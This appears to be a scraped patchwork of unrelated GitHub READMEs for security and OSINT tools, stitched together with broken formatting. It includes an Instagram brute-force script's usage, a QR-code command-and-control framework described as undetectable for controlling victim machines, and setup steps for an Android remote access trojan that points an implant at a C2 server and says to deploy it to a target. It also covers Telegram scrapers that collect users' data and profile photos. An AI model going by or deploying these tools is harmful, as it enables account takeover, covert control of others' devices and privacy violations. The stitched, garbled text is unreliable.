class PhoneNumber(Entity):
name: ClassVar[str] = "Phone Number"
description: ClassVar[str] = "A phone number entity with country code and validation"
def init_properties(self):
"""Initialize phone number properties"""
self.setup_properties({
"number": str,
"country_code": str,
"carrier": str,
"type": str, # mobile, landline, etc.
"verified": bool
})
def update_label(self):
"""Update the display label"""
self.label = self.format_label(["country_code", "number"])
### Custom Transforms Transforms are operations that process entities and generate new insights or relationships. To create a custom transform: 1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`) 2. Implement your transform class: from dataclasses import dataclass
from typing import ClassVar, List
from .base import Transform
from entities.base import Entity
from entities.phone_number import PhoneNumber
from entities.location import Location
from ui.managers.status_manager import StatusManager
@dataclass
class PhoneLookup(Transform):
name: ClassVar[str] = "Phone Number Lookup"
description: ClassVar[str] = "Lookup phone number details and location"
input_types: ClassVar[List[str]] = ["PhoneNumber"]
output_types: ClassVar[List[str]] = ["Location"]
async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
if not isinstance(entity, PhoneNumber):
return []
status = StatusManager.get()
operation_id = status.start_loading("Phone Lookup")
try:
# Your phone number lookup logic here
# Example: query an API for phone number details
location = Location(properties={
"country": "Example Country",
"region": "Example Region",
"carrier": "Example Carrier",
"source": "PhoneLookup transform"
})
return [location]
except Exception as e:
status.set_text(f"Error during phone lookup: {str(e)}")
return []
finally:
status.stop_loading(operation_id)
### Custom Helpers Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper: 1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`) 2. Implement your helper class: from PySide6.QtWidgets import (
QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
QTextEdit, QLabel, QComboBox
)
from .base import BaseHelper
from qasync import asyncSlot
class DummyHelper(BaseHelper):
"""A dummy helper for testing"""
name = "Dummy Helper"
description = "A dummy helper for testing"
def setup_ui(self):
"""Initialize the helper's user interface"""
# Create input text area
self.input_label = QLabel("Input:")
self.input_text = QTextEdit()
self.input_text.setPlaceholderText("Enter text to process...")
self.input_text.setMinimumHeight(100)
# Create operation selector
operation_layout = QHBoxLayout()
self.operation_label = QLabel("Operation:")
self.operation_combo = QComboBox()
self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
operation_layout.addWidget(self.operation_label)
operation_layout.addWidget(self.operation_combo)
# Create process button
self.process_btn = QPushButton("Process")
self.process_btn.clicked.connect(self.process_text)
# Create output text area
self.output_label = QLabel("Output:")
self.output_text = QTextEdit()
self.output_text.setReadOnly(True)
self.output_text.setMinimumHeight(100)
# Add widgets to main layout
self.main_layout.addWidget(self.input_label)
self.main_layout.addWidget(self.input_text)
self.main_layout.addLayout(operation_layout)
self.main_layout.addWidget(self.process_btn)
self.main_layout.addWidget(self.output_label)
self.main_layout.addWidget(self.output_text)
# Set dialog size
self.resize(400, 500)
@asyncSlot()
async def process_text(self):
"""Process the input text based on selected operation"""
text = self.input_text.toPlainText()
operation = self.operation_combo.currentText()
if operation == "Uppercase":
result = text.upper()
elif operation == "Lowercase":
result = text.lower()
else: # Title Case
result = text.title()
self.output_text.setPlainText(result)
This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.
You are free to: - β Share: Copy and redistribute the material - β Adapt: Remix, transform, and build upon the material
Under these terms: - βΉοΈ Attribution: You must give appropriate credit - π« NonCommercial: No commercial use - π No additional restrictions
Special thanks to all library authors and contributors who made this project possible.
Created by ALW1EZ with AI β€οΈ
This project is a command line tool and python library that uses Wappalyzer extension (and its fingerprints) to detect technologies. Other projects emerged after discontinuation of the official open source project are using outdated fingerpints and lack accuracy when used on dynamic web-apps, this project bypasses those limitations.
Before installing wappalyzer, you will to install Firefox and geckodriver/releases">geckodriver. Below are detailed steps for setting up geckodriver but you may use google/youtube for help.
geckodriver-vX.XX.X-win64.zip
geckodriver-vX.XX.X-macos.tar.gz
geckodriver-vX.XX.X-linux64.tar.gz
To ensure Selenium can locate the GeckoDriver executable: - Windows: 1. Move the geckodriver.exe
to a directory (e.g., C:\WebDrivers\
). 2. Add this directory to the system's PATH: - Open Environment Variables. - Under System Variables, find and select the Path
variable, then click Edit. - Click New and enter the directory path where geckodriver.exe
is stored. - Click OK to save. - macOS/Linux: 1. Move the geckodriver
file to /usr/local/bin/
or another directory in your PATH. 2. Use the following command in the terminal: bash sudo mv geckodriver /usr/local/bin/
Ensure /usr/local/bin/
is in your PATH.
pipx install wappalyzer
To use it as a library, install it with pip
inside an isolated container e.g. venv
or docker
. You may also --break-system-packages
to do a 'regular' install but it is not recommended.
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
docker compose up -d
To scan URLs using the Docker container:
Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
docker compose run --rm wappalyzer -i https://example.com -oJ output.json
Some common usage examples are given below, refer to list of all options for more information.
wappalyzer -i https://example.com
wappalyzer -i urls.txt -t 10
wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
wappalyzer -i https://example.com -oJ results.json
Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.
-i
: Input URL or file containing URLs (one per line)--scan-type
: Scan type (default: 'full')fast
: Quick HTTP-based scan (sends 1 request)balanced
: HTTP-based scan with more requestsfull
: Complete scan using wappalyzer extension-t, --threads
: Number of concurrent threads (default: 5)-oJ
: JSON output file path-oC
: CSV output file path-oH
: HTML output file path-c, --cookie
: Cookie header string for authenticated scansThe python library is a available on pypi as wappalyzer
and can be imported with the same name.
The main function you'll interact with is analyze()
:
from wappalyzer import analyze
# Basic usage
results = analyze('https://example.com')
# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)
url
(str): The URL to analyzescan_type
(str, optional): Type of scan to perform'fast'
: Quick HTTP-based scan'balanced'
: HTTP-based scan with more requests'full'
: Complete scan including JavaScript execution (default)threads
(int, optional): Number of threads for parallel processing (default: 3)cookie
(str, optional): Cookie header string for authenticated scansReturns a dictionary with the URL as key and detected technologies as value:
{
"https://github.com": {
"Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
"lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
"React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]},
"https://google.com" : {},
"https://example.com" : {},
}}
Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.
Enhanced version of bellingcat's Telegram Phone Checker!
A Python script to check Telegram accounts using phone numbers or username.
git clone https://github.com/unnohwn/telegram-checker.git
cd telegram-checker
pip install -r requirements.txt
Contents of requirements.txt
:
telethon
rich
click
python-dotenv
Or install packages individually:
pip install telethon rich click python-dotenv
First time running the script, you'll need: - Telegram API credentials (get from https://my.telegram.org/apps) - Your Telegram phone number including countrycode + - Verification code (sent to your Telegram)
Run the script:
python telegram_checker.py
Choose from options: 1. Check phone numbers from input 2. Check phone numbers from file 3. Check usernames from input 4. Check usernames from file 5. Clear saved credentials 6. Exit
Results are saved in: - results/
- JSON files with detailed information - profile_photos/
- Downloaded profile pictures
This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.
MIT License
Torward is an improved version based on the torghost-gn and darktor scripts, designed to enhance anonymity on the Internet. The tool prevents data leaks and forces all traffic from our computer to be routed exclusively through the Tor network, providing a high level of privacy in our connections.
git clone https://github.com/chundefined/Torward.git
cd Torward
chmod +x install.sh
./install.sh
This version includes several key security improvements to protect your identity and ensure better network configuration:
IPv6 Leak Prevention
IPv6 is now disabled to prevent any potential IP leaks. All traffic is forced through the Tor network by modifying system IPv6 settings in network_config.py
.
Enhanced iptables Rules
Strict iptables rules are implemented to ensure only Tor traffic is allowed. Non-Tor traffic is blocked, DNS queries are routed through Tor, and only essential connections to Tor ports are permitted. Additionally, IPv6 traffic is blocked to prevent leaks.
Tor Configuration Adjustments
The torward
file has been updated to enforce that all traffic, including DNS queries, is routed through Tor, improving anonymity.
Instagram Brute Force CPU/GPU Supported 2024
(Use option 2 while running the script.)
(Option 1 is on development)
(Chrome should be downloaded in device.)
Compatible and Tested (GUI Supported Operating Systems Only)
Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher
Install Requirements
pip install -r requirements.txt
How to run
python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161
QuickResponseC2 is a stealthy Command and Control (C2) framework that enables indirect and covert communication between the attacker and victim machines via an intermediate HTTP/S server. All network activity is limited to uploading and downloading images, making it an fully undetectable by IPS/IDS Systems and an ideal tool for security research and penetration testing.
Command Execution via QR Codes:
Users can send custom commands to the victim machine, encoded as QR codes.
Victims scan the QR code, which triggers the execution of the command on their system.
The command can be anything from simple queries to complex operations based on the test scenario.
Result Retrieval:
Results of the executed command are returned from the victim system and encoded into a QR code.
The server decodes the result and provides feedback to the attacker for further analysis or follow-up actions.
Built-in HTTP Server:
The tool includes a lightweight HTTP server that facilitates the victim machine's retrieval of command QR codes.
Results are sent back to the server as QR code images, and they are automatically saved with unique filenames for easy management.
The attacker's machine handles multiple requests, with HTTP logs organized and saved separately.
Stealthy Communication:
QuickResponseC2 operates under the radar, with minimal traces, providing a covert way to interact with the victim machine without alerting security defenses.
Ideal for security assessments or testing command-and-control methodologies without being detected.
File Handling:
The tool automatically saves all QR codes (command and result) to the server_files
directory, using sequential filenames like command0.png
, command1.png
, etc.
Decoding and processing of result files are handled seamlessly.
User-Friendly Interface:
The tool is operated via a simple command-line interface, allowing users to set up a C2 server, send commands, and receive results with ease.
No additional complex configurations or dependencies are needed.
pip3 install -r requirements.txt
python3 main.py
1 - Run the C2 Server
2 - Build the Victim Implant
https://github.com/user-attachments/assets/382e9350-d650-44e5-b8ef-b43ec90b315d
8080
).commandX.png
on the HTTP server.commandX.png
), it downloads and decodes the image to retrieve the command.resultX.png
.resultX.png
).Feel free to fork and contribute! Pull requests are welcome.
A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.
___________________ _________
\__ ___/ _____/ / _____/
| | / \ ___ \_____ \
| | \ \_\ \/ \
|____| \______ /_______ /
\/ \/
Before running the script, you'll need:
pip install -r requirements.txt
Contents of requirements.txt
:
telethon
aiohttp
asyncio
api_id
: A numberapi_hash
: A string of letters and numbersKeep these credentials safe, you'll need them to run the script!
git clone https://github.com/unnohwn/telegram-scraper.git
cd telegram-scraper
pip install -r requirements.txt
python telegram-scraper.py
When scraping a channel for the first time, please note:
The script provides an interactive menu with the following options:
You can use either: - Channel username (e.g., channelname
) - Channel ID (e.g., -1001234567890
)
Data is stored in SQLite databases, one per channel: - Location: ./channelname/channelname.db
- Table: messages
- id
: Primary key - message_id
: Telegram message ID - date
: Message timestamp - sender_id
: Sender's Telegram ID - first_name
: Sender's first name - last_name
: Sender's last name - username
: Sender's username - message
: Message text - media_type
: Type of media (if any) - media_path
: Local path to downloaded media - reply_to
: ID of replied message (if any)
Media files are stored in: - Location: ./channelname/media/
- Files are named using message ID or original filename
Data can be exported in two formats: 1. CSV: ./channelname/channelname.csv
- Human-readable spreadsheet format - Easy to import into Excel/Google Sheets
./channelname/channelname.json
The continuous scraping feature ([C]
option) allows you to: - Monitor channels in real-time - Automatically download new messages - Download media as it's posted - Run indefinitely until interrupted (Ctrl+C) - Maintains state between runs
The script can download: - Photos - Documents - Other media types supported by Telegram - Automatically retries failed downloads - Skips existing files to avoid duplicates
The script includes: - Automatic retry mechanism for failed media downloads - State preservation in case of interruption - Flood control compliance - Error logging for failed operations
Contributions are welcome! Please feel free to submit a Pull Request.
This project is licensed under the MIT License - see the LICENSE file for details.
This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations
Remote adminitration tool for android
console git clone https://github.com/Tomiwa-Ot/moukthar.git
/var/www/html/
and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web-socket/ composer install cd /var/www chown -R www-data:www-data . chmod -R 777 .
The default credentials are username: android
and password: android
mysql CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password'; GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost'; FLUSH PRIVILEGES;
c2-server/.env
and web-socket/.env
database.sql
console php Server/web-socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
/etc/apache2/sites-available/000-default.conf
```console ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
- Modify
/etc/apache2/apache2.confxml Comment this section #
Add this - Increase php file upload max size
/etc/php/./apache2/php.iniini ; Increase size to permit large file uploads from client upload_max_filesize = 128M ; Set post_max_size to upload_max_filesize + 1 post_max_size = 129M
- Set web socket server address in <script> tag in
c2-server/src/View/home.phpand
c2-server/src/View/features/files.phpconsole const ws = new WebSocket('ws://IP_ADDRESS:8080');
- Restart apache using the command below
console sudo a2enmod rewrite && sudo service apache2 restart - Set C2 server and web socket server address in client
functionality/Utils.javajava public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target
![]() |
Lobo GuarΓ‘ is a platform aimed at cybersecurity professionals, with various features focused on Cyber Threat Intelligence (CTI). It offers tools that make it easier to identify threats, monitor data leaks, analyze suspicious domains and URLs, and much more.
Allows identifying domains and subdomains that may pose a threat to organizations. SSL certificates issued by trusted authorities are indexed in real-time, and users can search using keywords of 4 or more characters.
Note: The current database contains certificates issued from September 5, 2024.
Allows the insertion of keywords for monitoring. When a certificate is issued and the common name contains the keyword (minimum of 5 characters), it will be displayed to the user.
Generates a link to capture device information from attackers. Useful when the security professional can contact the attacker in some way.
Performs a scan on a domain, displaying whois information and subdomains associated with that domain.
Allows performing a scan on a URL to identify URIs (web paths) related to that URL.
Performs a scan on a URL, generating a screenshot and a mirror of the page. The result can be made public to assist in taking down malicious websites.
Monitors a URL with no active application until it returns an HTTP 200 code. At that moment, it automatically initiates a URL scan, providing evidence for actions against malicious sites.
Centralizes intelligence news from various channels, keeping users updated on the latest threats.
The application installation has been approved on Ubuntu 24.04 Server and Red Hat 9.4 distributions, the links for which are below:
Lobo GuarΓ‘ Implementation on Ubuntu 24.04
Lobo GuarΓ‘ Implementation on Red Hat 9.4
There is a Dockerfile and a docker-compose version of Lobo GuarΓ‘ too. Just clone the repo and do:
docker compose up
Then, go to your web browser at localhost:7405.
Before proceeding with the installation, ensure the following dependencies are installed:
git clone https://github.com/olivsec/loboguara.git
cd loboguara/
nano server/app/config.py
Fill in the required parameters in the config.py
file:
class Config:
SECRET_KEY = 'YOUR_SECRET_KEY_HERE'
SQLALCHEMY_DATABASE_URI = 'postgresql://guarauser:YOUR_PASSWORD_HERE@localhost/guaradb?sslmode=disable'
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = 'smtp.example.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = 'no-reply@example.com'
MAIL_PASSWORD = 'YOUR_SMTP_PASSWORD_HERE'
MAIL_DEFAULT_SENDER = 'no-reply@example.com'
ALLOWED_DOMAINS = ['yourdomain1.my.id', 'yourdomain2.com', 'yourdomain3.net']
API_ACCESS_TOKEN = 'YOUR_LOBOGUARA_API_TOKEN_HERE'
API_URL = 'https://loboguara.olivsec.com.br/api'
CHROME_DRIVER_PATH = '/opt/loboguara/bin/chromedriver'
GOOGLE_CHROME_PATH = '/opt/loboguara/bin/google-chrome'
FFUF_PATH = '/opt/loboguara/bin/ffuf'
SUBFINDER_PATH = '/opt/loboguara/bin/subfinder'
LOG_LEVEL = 'ERROR'
LOG_FILE = '/opt/loboguara/logs/loboguara.log'
sudo chmod +x ./install.sh
sudo ./install.sh
sudo -u loboguara /opt/loboguara/start.sh
Access the URL below to register the Lobo GuarΓ‘ Super Admin
http://your_address:7405/admin
Access the Lobo GuarΓ‘ platform online: https://loboguara.olivsec.com.br/
A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.
Due to Telegram API restrictions, this script can only access stories from: - Users you have added to your friend list - Users whose privacy settings allow you to view their stories
This is a limitation of Telegram's API and cannot be bypassed.
Before running the script, you'll need:
pip install -r requirements.txt
Contents of requirements.txt
:
telethon
openpyxl
schedule
api_id
: A numberapi_hash
: A string of letters and numbersKeep these credentials safe, you'll need them to run the script!
git clone https://github.com/unnohwn/telegram-story-scraper.git
cd telegram-story-scraper
pip install -r requirements.txt
python TGSS.py
The script: 1. Connects to your Telegram account 2. Periodically checks for new stories from your friends 3. Downloads any new stories (photos/videos) 4. Stores metadata in a SQLite database 5. Exports information to an Excel file 6. Runs continuously until interrupted (Ctrl+C)
SQLite database containing: - user_id
: Telegram user ID of the story creator - story_id
: Unique story identifier - timestamp
: When the story was posted (UTC+2) - filename
: Local filename of the downloaded media
Export file containing the same information as the database, useful for: - Easy viewing of story metadata - Filtering and sorting - Data analysis - Sharing data with others
{user_id}_{story_id}.jpg
{user_id}_{story_id}.{extension}
The script includes: - Automatic retry mechanism for failed downloads - Error logging for failed operations - Connection error handling - State preservation in case of interruption
Contributions are welcome! Please feel free to submit a Pull Request.
This project is licensed under the MIT License - see the LICENSE file for details.
This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations - Respect user privacy
This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.
pip install requests
python3 gitgrab.py